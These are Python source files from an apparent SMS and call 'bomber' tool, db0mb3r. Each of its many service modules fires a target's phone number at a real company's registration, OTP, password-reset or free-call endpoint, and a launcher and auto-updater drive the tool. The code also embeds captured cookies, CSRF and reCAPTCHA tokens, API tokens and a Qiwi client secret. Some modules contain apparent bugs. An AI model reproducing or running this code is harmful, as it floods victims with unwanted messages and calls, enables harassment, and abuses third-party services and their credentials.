from db0mb3r.services.service import Service


class Sravni(Service):
    async def run(self):
        await self.post(
            "https://my.sravni.ru/signin/code",
            data={
                "__RequestVerificationToken": "CfDJ8Mo79Uhrc61BkNG7HBanVqfddj1HvO3ZSASCL80JzDrO0POC-Mgp1O-nte3Fk2FzD_MSBw6-P9d4Q8229e4gXa7YRY1nYzTh7U82Qs3QLA-dttR2kfxtMxoWZYlvX34LeXH8U9JDHgyxQcOkGoCs2Nk",
                "phone": "+" + self.formatted_phone,
                "returnUrl": "/connect/authorize/callback?client_id=www&amp;scope=openid%20offline_access%20email%20phone%20profile%20roles%20Sravni.Reviews.Service%20Sravni.Osago.Service%20Sravni.QnA.Service%20Sravni.FileStorage.Service%20Sravni.Memory.Service%20reviews%20Sravni.PhoneVerifier.Service%20Sravni.Identity.Service%20Sravni.VZR.Service%20messagesender.sms%20Sravni.Affiliates.Service%20esia%20orders.r&amp;response_type=code%20id_token%20token&amp;redirect_uri=https%3A%2F%2Fwww.sravni.ru%2Fopenid%2Fcallback%2F&amp;response_mode=form_post&amp;state=RmridyVgj733j_o_VUUUdgSTeMe1W3FdxzSMsz4IWP0&amp;nonce=zrwOa2xfDJLNRbfKi36P2VDjfAmlLZ-EnKg4u4Whwxs&amp;login_hint&amp;acr_values"
            },
            headers={
                "Connection": "keep-alive",
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.207",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                "Accept": "*/*",
                "Origin": "https://my.sravni.ru",
                "Sec-Fetch-Site": "same-origin",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Dest": "empty",
                "Referer": "https://my.sravni.ru/signin?ReturnUrl=%2Fconnect%2Fauthorize%2Fcallback%3Fclient_id%3Dwww%26scope%3Dopenid%2520offline_access%2520email%2520phone%2520profile%2520roles%2520Sravni.Reviews.Service%2520Sravni.Osago.Service%2520Sravni.QnA.Service%2520Sravni.FileStorage.Service%2520Sravni.Memory.Service%2520reviews%2520Sravni.PhoneVerifier.Service%2520Sravni.Identity.Service%2520Sravni.VZR.Service%2520messagesender.sms%2520Sravni.Affiliates.Service%2520esia%2520orders.r%26response_type%3Dcode%2520id_token%2520token%26redirect_uri%3Dhttps%253A%252F%252Fwww.sravni.ru%252Fopenid%252Fcallback%252F%26response_mode%3Dform_post%26state%3DRmridyVgj733j_o_VUUUdgSTeMe1W3FdxzSMsz4IWP0%26nonce%3DzrwOa2xfDJLNRbfKi36P2VDjfAmlLZ-EnKg4u4Whwxs%26login_hint%26acr_values&isinnerframe=true",
                "Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7",
            },
            cookies={
                "_ym_uid": "1605105660244322467",
                "_ym_d": "1605105660",
                ".ASPXANONYMOUS": "jvxYwEsMfk6BXQlriYYL-A",
                "_SL_": "6.1509745.1509752.",
                "_ipl": "6.1509745.1509752.",
                "AB_CREDIT": "Test_00035_A",
                "AB_CREDIT_DIRECT": "never",
                "__utmz": "utmccn%3d(not%20set)%7cutmcct%3d(not%20set)%7cutmcmd%3dorganic%7cutmcsr%3dyandex%7cutmctr%3d(not%20set)",
                "__utmx": "utmccn%3d(not%20set)%7cutmcct%3d(not%20set)%7cutmcmd%3dorganic%7cutmcsr%3dyandex%7cutmctr%3d(not%20set)",
                "_gcl_au": "1.1.1184645255.1615059953",
                "_gid": "GA1.2.2020936344.1615059954",
                "_ga": "GA1.1.438067474.1615059954",
                "_ym_isad": "1",
                "_ym_visorc": "b",
                "_fbp": "fb.1.1615059955644.1650744830",
                "_ga_TEQH0NKK0Q": "GS1.1.1615059953.1.0.1615059960.53",
                ".AspNetCore.Antiforgery.vnVzMy2Mv7Q": "CfDJ8Mo79Uhrc61BkNG7HBanVqey_muvSzqi8_qIWrDo7MvoMz1r6iPZhAwaENKUFBCsiIHPPym3PgRb6xnirgX748K_CmjcUdOCglvTvyYhl6X8hX4N3BFiH_-8LFKVUPq5VsP0Cu_jIIaR6ZNHpJCBvEQ",
                "reuserid": "7f78bafd-738d-4923-8eb8-4541519c3745",
            }
        )



from db0mb3r.services.service import Service

class Telegram(Service):

    async def run(self):
        await self.post(
            "https://my.telegram.org/auth/send_password",
            data={'phone': '+' + self.formatted_phone},
        )



from db0mb3r.services.service import Service

class BurgerKing(Service):
    async def run(self):
        await self.post(
            "https://burgerking.ru/middleware/bridge/api/v3/auth/signup",
            json={"phone": self.formatted_phone, "invite": ""}
        )



import asyncio
import os
import re
import subprocess
import sys
import webbrowser
from functools import lru_cache
from typing import Awaitable, Callable

import pkg_resources
import httpx

from loguru import logger

@logger.catch
def open_url(url: str):
    logger.info(f"Opening {url}...")
    if "com.termux" in os.environ.get("PREFIX", ""):  # If device is running Termux
        try:
            subprocess.run(
                [
                    "am",
                    "start",
                    "--user",
                    "0",
                    "-a",
                    "android.intent.action.VIEW",
                    "-d",
                    url,
                ]
            )
            return
        except FileNotFoundError:
            pass

    webbrowser.open(url, new=2, autoraise=True)


@logger.catch
@lru_cache(maxsize=None)
def retrieve_installed_version() -> str:
    package_info = subprocess.run(
        [sys.executable, "-m", "pip", "show", "db0mb3r"],
        stdout=subprocess.PIPE,
        check=True,
    )
    bytes_version = re.search(br"Version: ([0-9]\.[0-9.]*)", package_info.stdout).group(
        1
    )
    return bytes_version.decode()

@logger.catch
def check_and_upgrade():
    logger.info("Checking for updates")

    version = pkg_resources.get_distribution("db0mb3r").version
    updates = httpx.get("https://raw.githubusercontent.com/dmitrijkotov634/b0mb3r/master/version")

    if updates.status_code == 200:
        values = updates.text[1:].split("\r\n", maxsplit=1)

        if version == values[0]:
            logger.success("No update required")
        else:
            logger.info("Downloading an update using pip")

            subprocess.check_call([sys.executable, "-m", "pip", "install", "db0mb3r==" + values[0]])
            logger.success("db0mb3r updated, changes will take effect after restart")

            print("\nChanges {}:\n{}\n".format(*values))          
            os.chdir(os.path.join(pkg_resources.get_distribution("db0mb3r").location, "db0mb3r"))

@logger.catch
async def await_with_callback(
    coroutine: Awaitable, callback: Callable, *args, **kwargs
):
    try:
        await coroutine
    except asyncio.CancelledError:
        raise
    except Exception:
        pass
    finally:
        callback(*args, **kwargs)



from db0mb3r.services.service import Service


class Taxi310(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "http://62.149.7.19:7200/api/account/register/sendConfirmCode",
            json={"phone": self.phone},
        )



from db0mb3r.services.service import Service

class CashU(Service):
    phone_codes = [7]
    
    async def run(self):
        await self.post(
            "https://cash-u.com/main/rest/firstrequest/phone/confirmation/send",
            data=(self.format(self.formatted_phone, '* (***) ***-**-**:'))
        )


from db0mb3r.services.service import Service

class SaveTime(Service):
    async def run(self):
        await self.post(
            "https://api.savetime.net/v2/client/login/" + self.formatted_phone,
            data='$------WebKitFormBoundaryVn8pvqIINnHzFQS4\\r\\nContent-Disposition: form-data; name="accept"\\r\\n\\r\\n1\\r\\n------WebKitFormBoundaryVn8pvqIINnHzFQS4--\\r\\n',
            headers={
                "Connection": "keep-alive",
                "X-HASH": "c625e41dcf708c70aec75d9219846249",
                "Accept": "application/json, text/plain, */*",
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.207",
                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryVn8pvqIINnHzFQS4",
                "Origin": "https://savetime.net",
                "Sec-Fetch-Site": "same-site",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Dest": "empty",
                "Referer": "https://savetime.net/?sidebar_open=login",
                "Accept-Language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7",
            },
        )



from db0mb3r.services.service import Service


class Pliskov(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://pliskov.ru/Cube.MoneyRent.Orchard.RentRequest/PhoneConfirmation/SendCode",
            data={"phone": self.format(self.formatted_phone, "+* (***) ***-**-**")},
        )



from db0mb3r.services.service import Service

class SushiWok(Service):
    async def run(self):
        await self.post(
            "https://sushiwok.ru/user/phone/validate",
            data=f'{"phone":"{self.formatted_phone}","numbers":4}',
            headers={
                "authority": "sushiwok.ru",
                "accept": "application/json, text/plain, */*",
                "x-csrf-token": "tz70vMoL-0VQInx5uaTRC14legs_CX8DC9os",
                "x-requested-with": "XMLHttpRequest",
                "user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 OPR/72.0.3815.207",
                "content-type": "application/json;charset=UTF-8",
                "origin": "https://sushiwok.ru",
                "sec-fetch-site": "same-origin",
                "sec-fetch-mode": "cors",
                "sec-fetch-dest": "empty",
                "referer": "https://sushiwok.ru/spb/profile/",
                "accept-language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7",
                "cookie": "_csrf=lH4Ryi1VBKZsZ2r7UkeCEfrK; connect.sid=s%3AGr79X3B4iQFod3Sein1U-GlPnQvTllce.LisIeAqUdn0NtG8UMpxKWyFxWOcXMka9wD%2BMzYLBSb0; _gid=GA1.2.2060884779.1615215100; _ym_uid=1615215101536389399; _ym_d=1615215101; lgvid=604639f846e0fb0001e64fc3; lgkey=3fceed4268e01da86922939315def11c; _ym_visorc=w; _ym_isad=1; _fbp=fb.1.1615215103948.1720604809; _gat_gtag_UA_88670217_1=1; _gat_ITRZ=1; _gat_SPB=1; _gat_GA=1; _ga=GA1.1.895858968.1615215100; _ga_TE53H5X77H=GS1.1.1615215102.1.1.1615215127.0",
            },
        )



from db0mb3r.services.service import Service

class Pizzahut(Service):

    async def run(self):
        await self.post(
            "https://pizzahut.ru/account/password-reset",
            data={"reset_by": "phone", "action_id": "pass-recovery", "phone": self.formatted_phone, "_token": "*"},
        )


from db0mb3r.services.service import Service


class Tele2TV(Service):
    async def run(self):
        await self.post(
            "http://tele2mwapp.cdnvideo.ru/api/v1/user/request-password.json",
            json={"MSISDN", self.formatted_phone}
        )



from db0mb3r.services.service import Service


class Call2Friends(Service):
    async def run(self):
        await self.get(
            "https://call2friends.com/call-my-phone/web/request-free-call",
            params={
                "phone": self.formatted_phone,
                "domain": "CALL2FRIENDS",
                "browser": "undefined",
            },
        )



from db0mb3r.services.service import Service

class Comfy(Service):

    async def run(self):
        await self.post(
            "https://comfy.ua/ua/customer/account/createPost",
            data={"registration_name": self.russian_name, "registration_phone": self.formatted_phone, "registration_email": self.email}
        )




from db0mb3r.services.service import Service

class Kari(Service):

    async def run(self):
        await self.get(
            "https://i.api.kari.com/ecommerce/client/registration/verify/phone/code?phone=%2B" + self.formatted_phone
        )


from db0mb3r.services.service import Service

class Qiwi(Service):

    async def run(self):
        await self.post(
            "https://mobile-api.qiwi.com/oauth/authorize",
            data={"response_type": "urn:qiwi:oauth:response-type:confirmation-id", "username": self.formatted_phone, "client_id": "android-qw", "client_secret": "zAm4FKq9UnSe7id"},
        )


from db0mb3r.services.service import Service


class Alltime(Service):
    phone_codes = [7]

    async def run(self):
        await self.post("https://www.alltime.ru/sservice/2020/form_register_phone.php",
                        data={"action": "send", "back": "/",
                              "phone": self.format(self.formatted_phone, "+* (***) ***-**-**")})



from db0mb3r.services.service import Service

class Rutube(Service):

    async def run(self):
        await self.post(
            "https://rutube.ru/api/accounts/sendpass/phone",
            data={"phone": "+" + self.formatted_phone}
        )


from db0mb3r.services.service import Service

class RabotaRu(Service):

    async def run(self):
        await self.post(
            "https://www.rabota.ru/remind",
            data={"credential": self.formatted_phone},
        )



from db0mb3r.services.service import Service


class GloriaJeans(Service):
    phone_codes = [7]

    async def run(self):
        await self.post('https://www.gloria-jeans.ru/phone-verification/send-code/registration',
                        json={"phoneNumber": "+" + self.formatted_phone})



from db0mb3r.services.service import Service

class Allo(Service):

    async def run(self):
        await self.post(
            "https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA",
            data={"firstname": self.russian_name, "telephone": self.formatted_phone, "email": self.email, "password": self.email, "form_key": "Zqqj7CyjkKG2ImM8"}
        )


from db0mb3r.services.service import Service

class Macdonal(Service):

    async def run(self):
        await self.post(
            "https://site-api.mcdonalds.ru/api/v1/user/login/phone",
            json={'number': self.formatted_phone, 'g-recaptcha-response': '03AGdBq24rQ30xdNbVMpoibIqu-cFMr5eQdEk5cghzJhxzYHbGRXKwwJbJx7HIBqh5scCXIqoSm403O5kv1DNSrh6EQhj_VKqgzZePMn7RJC3ndHE1u0AwdZjT3Wjta7ozISZ2bTBFMaaEFgyaYTVC3KwK8y5vvt5O3SSts4VOVDtBOPB9VSDz2G0b6lOdVGZ1jkUY5_D8MFnRotYclfk_bRanAqLZTVWj0JlRjDB2mc2jxRDm0nRKOlZoovM9eedLRHT4rW_v9uRFt34OF-2maqFsoPHUThLY3tuaZctr4qIa9JkfvfbVxE9IGhJ8P14BoBmq5ZsCpsnvH9VidrcMdDczYqvTa1FL5NbV9WX-gOEOudLhOK6_QxNfcAnoU3WA6jeP5KlYA-dy1YxrV32fCk9O063UZ-rP3mVzlK0kfXCK1atTsBgy2p4N7MlR77lDY9HybTWn5U9V'}
        )



import asyncio
import os
import sys

import click
import pkg_resources
import uvicorn
from loguru import logger

os.chdir(os.path.join(pkg_resources.get_distribution("db0mb3r").location, "db0mb3r"))

from db0mb3r.app.main import app
from db0mb3r.service import prepare_services
from db0mb3r.utils import open_url, check_and_upgrade

@logger.catch
@click.command()
@click.option("--ip", default="127.0.0.1")
@click.option("--port", default=8080)
@click.option("--only-api", "only_api", is_flag=True, default=False)
@click.option("--disable-updates", "disable_updates", is_flag=True, default=False)
def main(ip: str, port: int, only_api: bool = False, disable_updates: bool = False):
    if sys.platform == "win32":
        loop = asyncio.ProactorEventLoop()
        asyncio.set_event_loop(loop)

    app.state.only_api = only_api

    if not disable_updates:
        check_and_upgrade()

    prepare_services()

    if not only_api:
        open_url(f"http://{ip}:{port}/")

    uvicorn.run(app, host=ip, port=port, log_level="error")

main()



from db0mb3r.services.service import Service

class Dixy(Service):
    async def run(self):
    	await self.post(
			"https://loyalty-api.dixy.ru//api/v1/users/register",
			headers={"appinfo": "eyJhcHBfdmVyc2lvbiI6IjIuMi4yKzMyMCIsImRldmljZSI6ImFuZHJvaWQiLCJkZXZpY2VfaWQiOiIyZGQ5YmZjZmUxOGMyMjYyIiwib3NfdmVyc2lvbiI6InNkazoyOCJ9", 
								"dixy-api-token": "7b2f81beb3bc53c95ea7074b9be34b14ca1cb9e0aad355d9be3defb7df54072a64f172051582b9276db166c18c4f410ca21ca603f04e3765c971f590fb7b0c5d"},
			json={"user": {"phone": self.formatted_phone, "platform": "android", "sms_hash": "EnLcVjUZitT",  "loyalty_region_id":"1"}}
		)